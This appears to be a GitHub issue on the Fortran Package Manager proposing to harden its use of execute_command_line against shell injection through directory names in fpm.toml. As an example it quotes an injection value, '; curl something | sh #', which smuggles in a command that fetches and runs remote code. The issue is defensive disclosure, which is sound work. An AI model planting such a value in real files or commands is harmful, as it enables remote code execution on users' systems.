Open
Description
Since we are using execute_command_line
quite a lot in Fortran fpm right now, we should think about a safe alternative for all external command invokations or a way to harden the input to execute_command_line
against exploits.
Injecting bash code with directory names from fpm.toml
using something like '; curl something | sh #'
would be one example to exploit the current way we are handling directory names. And '; curl something | sh #'
happens to be a perfectly fine directory name on Unix systems.
As this projects matures a security policy regarding those issues is needed to avoid having exploits discussed publicly in an issue.
Metadata
Metadata
Assignees
Labels
No labels